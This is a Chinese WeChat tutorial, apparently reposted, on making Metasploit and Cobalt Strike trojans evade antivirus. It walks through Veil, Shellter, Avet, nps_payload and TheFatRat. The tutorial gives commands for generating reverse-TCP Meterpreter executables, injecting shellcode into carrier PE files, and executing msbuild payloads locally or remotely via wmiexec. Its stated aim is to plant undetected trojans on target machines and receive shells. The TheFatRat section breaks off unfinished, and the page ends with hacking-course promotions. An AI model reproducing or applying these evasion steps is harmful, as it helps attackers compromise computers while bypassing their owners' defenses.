> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/om_UFIasCJ3Q1MUy7NnVAA)
**零基础学黑客,领取配套视频
**
**#统统可白嫖#**
扫码找小助理白嫖黑客资料

前言
-----
常用后渗透过程中往往要使用 msf 和 cs 等工具的木马,而默认生成的木马非常容易被杀毒软件检出,这个时候就需要对木马进行免杀,本文介绍几款免杀工具的使用。
虽然经过杀毒软件多年更新,这些工具免杀效果可能已经很一般了,但是相比于自己写编码器解码器来做免杀更为方便简单,没有任何编程积累也可以直接使用。
veil
----
### 下载安装
docker 安装 veil
```
docker pull mattiasohlsson/veil
```
映射路径并运行
| docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
|
### 介绍
list 命令可查看其两个免杀工具,Evasion 和 Ordnance
* Evasion 可用于文件免杀
* Ordnance 可生成 shellcode
### 生成 msf 免杀 payload
```
进入Evasion
use 1
```

```
查看可用的payloads
list payloads
```

```
选择要使用的payloads,如选择ruby的meterpreter/rev_tcp
use 39
```
```
设置监听ip和端口
set lhost xx.xx.xx.xx
set lport 4444
```

```
生成可执行文件并取名test
generate
test
由于刚才配置了映射路径,可执行文件被生成在本机的/tmp/veil-output/compiled路径下,对应的msf的配置文件被生成在/tmp/veil-output/handlers路径下
在本地使用msf配置文件开启msf监听
msfconsole -r test.rc
将test.exe传入目标机器,并运行,反弹回shell
```
### 使用自定义 payload 生成免杀木马
使用 cs 的 payload 为例
首先在 cs 的界面,攻击 - 生成后门 - payload generator-veil,保存为 payload.txt
开启 veil,之前步骤同上
```
选择13号payload
generate
```
在 generate 之后的选项中选择 3 号,自定义 payload,然后粘贴 payload.txt 内容,确认生成

shellter
-----------
### 下载安装
下载 windows 版
https://www.shellterproject.com/download/
### 使用 shellter 注入 shellcode
寻找或自行编译一个 32 位 pe 程序作为载体
打开 shellter
设置注入目标 pe 程序

选择本地 payload 或自定义 payload
```
L为本地
输入1选择常规的Meterpreter_Reverse_TCP
```
设置 lhost 和 lport

成功生成免杀恶意程序
Avet
----
### 下载安装
```
git clone https://github.com/govolution/avet
cd avet
./setup.sh
```
使用 Avet 生成免杀文件
启动
```
python ./avet.py
```
选择要使用的 payload 编号
设置监听 ip 端口以及其他配置
生成免杀可执行文件

nps_payload
--------------
### 下载安装
```
git clone https://github.com/trustedsec/nps_payload
cd nps_payload/
pip install -r requirements.txt
```
### 生成
```
python nps_payload.py
选择1生成msf类型payload
选择payload类型
设置IP和端口
生成
```

### 执行
```
1. 本地加载执行:
- %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \msbuild_nps.xml
2. 远程文件执行:
wmiexec.py :''@ cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\\\msbuild_nps.xml
```
msf 监听
```
msfconsole -r msbuild_nps.rc
```
TheFatRat
------------
### 下载安装
```
git clone https://github.com/Screetsec/TheFatRat
cd TheFatRat
chmod +x setup.sh
./setup.sh
```
运行
@
**欢迎加我微信:zkaq99、**实时分享安全动态
* * *

[
超级牛批的 IP 地址查询工具
2021-06-25

](http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247524023&idx=2&sn=f672c41128061e1577758d7ebd964a00&chksm=ebead79adc9d5e8c75e4a6af7b245b88077ede960ded86265fa14ac4e34611b3201d23be26b9&scene=21#wechat_redirect)
[
震惊!从一个 0day 到两个 0day 的奇妙之旅
2021-06-23

](http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247523571&idx=1&sn=4db6247e86abe84872c4ce090a9922e5&chksm=ebead5dedc9d5cc8ee27e5a6111d044124e4802536e7cac695e8f5cd7452b21df86b2143daad&scene=21#wechat_redirect)
[
黑客技能|教你用手机代替各类门禁卡
2021-06-22

](http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247523367&idx=1&sn=b21ac7a31c017da78f7d45665fbc865b&chksm=ebead50adc9d5c1c006423d15e05ab402d023321f6fae6aaabc5c6876ff053faf9e77bf2b935&scene=21#wechat_redirect)
[
实战 | 偶遇一赌博网站,渗透诛之!
2021-06-20

](http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247523181&idx=1&sn=2cf5471f209baf9bad0a9cf2cdfb5b8f&chksm=ebead240dc9d5b562eb7e90acc1a900c010176abea6ba15ca747b066b60b55e937fc6f2cac53&scene=21#wechat_redirect)
[
一条 Fofa 搜索语法,实现批量挖洞
2021-06-15

](http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247522709&idx=1&sn=1470d7506167c835eaac4538a486c77f&chksm=ebead0b8dc9d59aeeac7b5d328146e8deab3fb1a25d650fb16d3575cba70e04a31079e7105ce&scene=21#wechat_redirect)
[
黑客技能|断网攻击与监听演示
2021-06-04

](http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247521713&idx=1&sn=ae4efd5b60465cf44be7b26e9abb5579&chksm=ebeadc9cdc9d558ad2b3dadf55a5571a0a5a52453248069186b2dc30101d9fc7b6cd5b88b343&scene=21#wechat_redirect)
[高段位隐藏 IP、提高溯源难度的几种实用方案!](http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247520982&idx=1&sn=1a81ae558d471bbb84d89f3fe8b62039&chksm=ebeadbfbdc9d52ed27653fadc9c2b453028e31c8329dd0fc8034878b4124a94d4829d5f73f31&scene=21#wechat_redirect)
[2021-05-27](http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247520982&idx=1&sn=1a81ae558d471bbb84d89f3fe8b62039&chksm=ebeadbfbdc9d52ed27653fadc9c2b453028e31c8329dd0fc8034878b4124a94d4829d5f73f31&scene=21#wechat_redirect)
**如果文章对你有帮助,请点个 “赞”、“再看”**